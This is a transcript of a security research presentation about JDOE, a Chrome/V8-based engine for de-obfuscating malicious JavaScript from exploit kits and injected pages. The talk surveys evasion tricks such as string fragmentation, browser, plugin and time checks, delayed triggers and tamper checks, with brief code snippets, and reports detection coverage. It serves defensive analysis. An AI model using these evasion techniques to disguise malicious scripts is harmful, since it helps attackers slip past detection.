Presentation is loading. Please wait.

Presentation is loading. Please wait.

Nick Guo, Ulysses Wang JavaScript De-Obfuscation Engine -- JDOE.

Published byNorma Benfield Modified over 9 years ago

Similar presentations

Presentation on theme: "Nick Guo, Ulysses Wang JavaScript De-Obfuscation Engine -- JDOE."— Presentation transcript:

1 Nick Guo, Ulysses Wang JavaScript De-Obfuscation Engine -- JDOE

2 Obfuscation Introduction Anti de-obfuscation Browser Knowledge Current Solution JDOE Demo Challenge & Improvement Agenda

3 Phase I Review Obfuscation Introduction

4 Concealing the intent of the code by making the code difficult for human analysis and detection Copy right protection Hide Information (E.g. Email address) Evade detection Obfuscation

5 Three types of obfuscations Injection obfuscation Public Packer Obfuscation Exploit Kit Obfuscation Obfuscation Types

6 “As recorded in 2007, over 80% of detected malicious code was already using obfuscation” Most obfuscations are simple. Injection: 83%, exploit kit: <1% Complex obfuscations occupy a small proportion. Obfuscation become more complex Obfuscation Types

7 JDOE Prototype Anti de-obfuscation

8 Splitting important codes into pieces of Javascirpt code, HTML code or external scripts String concatenate – Var temp=“get”+”Elem”+”ent”+”ById” Tag concatenate – Put content in,, – OpenSource Exploit kit Fragmentation

9 File concatenate – Put critical function or data in another file – Phoenix Exploit Kit 2.5 Traffic concatenate – Save data on server and client need to request Fragmentation

10 Fetch external access or perform a connection check Ajax fetch data Connection check – Neosploit exploit kit External Access

11 Browser detect uas=navigator.userAgent; while(uai<uas.length) {xor+=uas.charCodeAt(uai++);} IE6 Firefox Condition check

12 Time check getUTCFullYear() getUTCMonth() getUTCDate() Plugin check new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); (IE) Check navigator.plugins (not IE) Condition check

13 Trigger a function after certain seconds setTimeout("alert(Hello!')",3000) setInterval("clock()",1000) Trigger a function on certain event <button id="j_id" onclick="j_function2();" window.attachEvent or addEventListener Trigger a function on plugin Call js function from Actionscript Trigger Function

14 Uncommon tag Save content in CSS Modification check var hybxs = arguments.callee;hybxs = hybxs.toString(); Bypass de-obfuscation tool

15 JDOE Prototype Browser Knowledge

16 Browser Component

17 Webkit

18 DOM Tree

19 Phase I Review Current Solution

20 Jsunpack Light weight Spidermonkey and Python Set hook in js file Environment DOM Enumeration Detection module(Yara) PDF and SWF parser Intrusion Detection(libnids) http://jsunpack.jeek.org/

21 Fireshark Firefox Plugin Mainwindow and child Frame Source Code Mainwindow and child Frame DOM Tree Http Request and Response Logged Malicious URL check URL redirection graph http://fireshark.org/

22 Malzilla Research tool Spidermonkey Shellcode analysis Limited DOM support http://malzilla.sourceforge.net/

23 Limitations Firefox based Limited on DOM support Limited on De-obfuscation Performance

24 Phase I Review JDOE

25 What engine we want ? High performance Good coverage Good output and log formats Analytics platform JDOE

26 JDOE is based on Google Chrome Render Engine : Webkit 85% smart phone browser market 21% desktop browser market Include DOM tree and parser JavaScript Engine : V8 JDOE

27 JDOE based on a test project for Chrome Command line tool, feasible to be ported as server- side application Be able to simulate basic functions of browser Full DOM Support Good fault tolerance about html format HTML format output Prototyping

28 JDOE Architecture

29 Base on Chrome and Webkit Strong Parser Full DOM Support Fast js execution speed High coverage Good expansibility JDOE advantage

30 JDOE De-obfuscation Method Hook eval() – Get some inner status of JavaScript Print the final DOM tree – Get the final status – Document.write should add some nodes in DOM tree De-obfuscation Method

31 Exploit kits Samples – Samples from Top 10 exploit kits project – Total Samples : 22 JDOE success : 20 – Coverage : 90.9% Exploit kit Coverage

32 Injection Samples – Samples from obfuscation ThreatID matches – Total Samples : 9,544 JDOE Success : 8,450 – Coverage : 88.5% Injection Coverage

33 Demo Demo time

34 Status and Next Step Challenge & Improvement

35 Security How to keep JDOE server secure? – Upgrade plan – Sandbox – Javascript Audit Performance Disable external access Coverage Not support on special samples Output format defected on special samples Challenge

36 More trigger function handler PDF and SWF Parser Shellcode detection Javascript Audit Cloud base integration http://aceinsight.websense.com/ Auto analysis platform improvement

37 Questions? 37 JDOE

Download ppt "Nick Guo, Ulysses Wang JavaScript De-Obfuscation Engine -- JDOE."

Similar presentations

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.
Java Script Session1 INTRODUCTION.

Java Script Session1 INTRODUCTION.
Client side performance in Web based Banking applications Divakar Prabhu Infosys Limited (NASDAQ: INFY)

Client side performance in Web based Banking applications Divakar Prabhu Infosys Limited (NASDAQ: INFY)
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang,

Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang,
An Evaluation of the Google Chrome Extension Security Architecture

An Evaluation of the Google Chrome Extension Security Architecture
JShield: Towards Real-time and Vulnerability-based Detection of Polluted Drive-by Download Attacks Yinzhi Cao*, Xiang Pan**, Yan Chen** and Jianwei Zhuge***

JShield: Towards Real-time and Vulnerability-based Detection of Polluted Drive-by Download Attacks Yinzhi Cao*, Xiang Pan**, Yan Chen** and Jianwei Zhuge***
Web 2.0 security Kushal Karanjkar Under guidance of Prof. Richard Sinn.

Web 2.0 security Kushal Karanjkar Under guidance of Prof. Richard Sinn.
Nick Guo, Ulysses Wang JavaScript 難読化解析エンジン – JDOE JavaScript の難読化解読を自動化する新しいアプローチ.

Nick Guo, Ulysses Wang JavaScript 難読化解析エンジン – JDOE JavaScript の難読化解読を自動化する新しいアプローチ.
MSc. Publishing on WWW JavaScript. What is JavaScript? A scripting language devised by Netscape Adds functionality to web pages by: Embedding code into.

MSc. Publishing on WWW JavaScript. What is JavaScript? A scripting language devised by Netscape Adds functionality to web pages by: Embedding code into.
CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.

CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.
1 CS6320 – Why Servlets? L. Grewe 2 What is a Servlet? Servlets are Java programs that can be run dynamically from a Web Server Servlets are Java programs.

1 CS6320 – Why Servlets? L. Grewe 2 What is a Servlet? Servlets are Java programs that can be run dynamically from a Web Server Servlets are Java programs.
It’s always better live. MSDN Events Developing ASP.NET AJAX Controls with Silverlight.

It’s always better live. MSDN Events Developing ASP.NET AJAX Controls with Silverlight.
Selenium – Testing Tool. What is Selenium? Selenium is a robust set of tools that supports rapid development of test automation for web-based applications.

Selenium – Testing Tool. What is Selenium? Selenium is a robust set of tools that supports rapid development of test automation for web-based applications.
ITM352 Javascript and Dynamic Web Pages: Client Side Processing.

ITM352 Javascript and Dynamic Web Pages: Client Side Processing.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
4.1 JavaScript Introduction

4.1 JavaScript Introduction
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
JavaScript & jQuery the missing manual Chapter 11

JavaScript & jQuery the missing manual Chapter 11
WaveMaker Visual AJAX Studio 4.0 Training Troubleshooting.

WaveMaker Visual AJAX Studio 4.0 Training Troubleshooting.

Similar presentations

Ads by Google